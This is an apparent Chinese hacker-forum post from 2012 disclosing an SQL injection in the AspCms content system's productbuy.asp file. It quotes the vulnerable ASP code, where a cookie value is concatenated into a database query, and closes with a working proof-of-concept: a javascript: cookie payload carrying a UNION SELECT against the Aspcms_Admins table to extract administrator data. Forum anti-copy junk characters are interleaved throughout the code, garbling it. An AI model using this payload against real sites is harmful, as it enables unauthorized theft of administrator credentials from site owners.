好久没上土司了,上来一看发现在删号名单内.....1 R) Y, |* Y- G& f2 G- b5 W
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。; u* q; ~3 _$ T
废话不多说,看代码:
- X9 E/ a- r O7 U1 W; G( m
/ `/ n1 ]/ p# [% E% J<%9 ?7 G5 H g5 d5 N+ m( G
1 @ {) E5 C7 @8 |, O" ?9 P/ W
if action = "buy" then2 y& h* H7 A/ s; W( G' H. T
8 a. }+ p) f* x5 A! S( s addOrder()( }9 E) S4 q8 N7 v1 D9 B6 S# l
8 O: z9 T9 k5 e% R/ o! q6 Felse
9 s% i i3 f% N* Y% S0 G' T8 [4 P( }" `2 w( T
echoContent()1 y5 Y" a! W& x+ Q' C% C' R
, O6 p7 ]* u; o
end if% T$ m n3 i/ S
3 u* z# B2 L; o! p7 Q1 [. R. u! F0 B
* Q1 e/ ?6 \0 [+ {" E$ r
4 E$ F$ n% {4 |( v8 U5 p……略过
- d' H2 C5 ^$ Z* K6 M# v7 }; R' {( W1 u
( B9 b+ ~& ?+ g$ C% ]( ]0 |4 |: d! V
! W: i2 C1 i& [4 f0 Q& f7 i# ]Sub echoContent()
4 x- c3 Q( L I
. W( J/ i/ o1 t- d dim id
7 @" r1 O5 c# H" _5 U. L# i9 l; e1 q8 [% l
id=getForm("id","get")( ~5 ]. R( k0 V9 h. y' q; I5 q* e
+ |( m/ |7 Y% Y! Y, B8 i }
. F, l! C& r: u, U7 A; d
& W. v4 `: f( e' a" ~( H( a6 ^ if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 3 p0 s$ _) z" P$ ?7 b
9 Q4 l/ B. c6 N) _& P
q0 s5 l# ^, J% K( X8 K8 e; S$ _" E/ }! \% a" s
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
$ o4 A8 ?8 Q! B: w- \" i
8 }0 K7 K3 | O% t8 F dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
7 ~" `' h) I1 U" c5 ?. h! ?5 _8 _6 s* S! ^- Q0 U% i
Dim templatePath,tempStr. t/ J- k! {, t9 B; k$ T( }3 x" R
. m7 |, I4 h( [1 r; I. a
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
1 Q$ M: F8 s; I$ v; Y: |! ~0 r
9 g* j/ D/ ~, W* b
$ U* T4 C" F& l$ `. P8 U4 V7 ]1 J+ e. V/ E: L& O8 E
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
+ s/ K* l$ c% a, w, P* H2 `' }0 z( k- X2 @" h0 i- b
selectproduct=rsObj(0)0 i" ? \ L+ v4 Z, n1 o3 W
& L" H" f% A1 Q" @
; A8 J5 E& h% r9 ]. ?' @; o6 `/ t5 }
Dim linkman,gender,phone,mobile,email,qq,address,postcode! D- V. ^6 w; ]1 h8 ]- K% \
& q5 o* A7 l8 u2 [/ Q8 N4 Y+ a F if isnul(rCookie("loginstatus")) then wCookie"loginstatus",03 d$ M; R- y6 x$ s' W& O5 r
' v/ n7 P! n- [7 k! M" B- r% p9 Y if rCookie("loginstatus")=1 then / x k" x! e% P1 {
6 ]& J. ]# J' I set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")- N' Q! w/ W1 M. X
! A; C) F3 f0 E& o0 F/ E
linkman=rsObj("truename")
a5 W5 m1 `( w4 Y$ `
$ Z6 a: j5 a8 ] gender=rsObj("gender")# h7 H/ e8 ?8 Y0 s* T
; `/ ~9 n4 m: c
phone=rsObj("phone"), L5 \! y0 U" S2 F
1 C7 B y8 L7 ^4 X2 H1 o mobile=rsObj("mobile")( c+ e' }% r* l7 e* X5 u
3 P( ]8 m {0 ~! J/ V0 f+ l email=rsObj("email")
, y1 I$ c6 B( p1 n2 L" p7 ]; z
2 k- P2 b/ u( {/ |. j7 J qq=rsObj("qq")
) n+ Q( { ?; e9 X$ Q1 e, z( R# [+ Q4 v' v; b. C
address=rsObj("address"): W! }' M# \. z+ l9 l8 C- C- A
6 {: d+ R; \: c/ E4 w$ L. M+ {; D
postcode=rsObj("postcode")$ o+ P: N1 m* m! E: o
) V" S6 Q, G( u3 ?) B, R
else
6 y9 B: q0 Q9 S E4 R, M( s5 J! T9 T' M; J1 F3 ~0 E, I& L% s- i v6 w A) `
gender=1) _& V" p" ]9 L) V; Y
5 k0 D e$ l7 g3 L- O# l
end if$ @! S5 G; n0 z" {' P
; x7 H- s# s/ u; u
rsObj.close()
4 E! u7 @- l' z9 |
* C+ k+ A# a/ n. P
1 t0 o n1 `1 a n# ~, u" M, D: ]: s; x& ~0 P b
with templateObj . L1 R ^6 }9 ?, j9 v
2 _- m2 v4 Y6 a; Y. O
.content=loadFile(templatePath) ( R* C4 q; e( I( y3 L
W7 h4 v6 k2 n, d0 J; L: f: H .parseHtml()
9 W4 ^' c. j+ r/ [7 D
$ e+ v4 @- D' L1 |! T .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
& x# B# K- v0 x9 w% X8 q: @" f
$ e! X' W9 w q .content=replaceStr(.content,"[aspcms:linkman]",linkman) 1 n6 V* ?$ G- D6 S( ]) [
/ J7 _ x: r; G/ h7 `! o
.content=replaceStr(.content,"[aspcms:gender]",gender)
' w' D3 U" \0 j {, S# z' c- C; p- A
( f- b5 x5 l* v5 C! M .content=replaceStr(.content,"[aspcms:phone]",phone) 2 t. o' ^4 `, C( u( N
& z! `* }5 j7 V: G7 u" Q8 b: t- Y
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
7 s. j# R2 j8 G; |
4 s3 n+ Z. ~2 B: V2 f9 O+ s2 i4 H .content=replaceStr(.content,"[aspcms:email]",email)
, E4 M- d- \/ z* N: d. o: H- `4 a" e" e a$ [- p0 ?
.content=replaceStr(.content,"[aspcms:qq]",qq)
& y5 @( y `1 V( u. U; B: b, z. ^7 l" I; f( m# }6 r7 l W
.content=replaceStr(.content,"[aspcms:address]",address) 4 s& p7 n- T9 V: i, n( X
5 l# r" k+ U: \0 y/ S .content=replaceStr(.content,"[aspcms:postcode]",postcode) ; [/ `2 f7 [5 R5 ?. ]3 j
( j& _4 y0 Q+ @0 o/ P+ L; \0 L .parseCommon()
# B# U7 X3 u: u- r6 b3 v$ f5 ]; S/ a
echo .content 7 l- q& V! `' i: q
. r, m [8 ] I, z* M
end with
6 @4 O, S# G7 x' U6 ^/ @! F. |6 j0 k* W( T
set templateobj =nothing : terminateAllObjects
7 M+ a2 X1 d) J& A9 O3 G* {1 k4 \# |& d0 e
End Sub) k7 i0 v( h. O0 s% c
漏洞很明显,没啥好说的
+ A" w2 e! B( Xpoc:
: [' S1 D) l: f2 y4 D/ J
# o Z9 ?" i. Gjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
! H" ]* k: H. ]5 y6 t; u' Q! D! p( g2 @
|
发表于 2012-12-27 08:35:05
收藏
支持
反对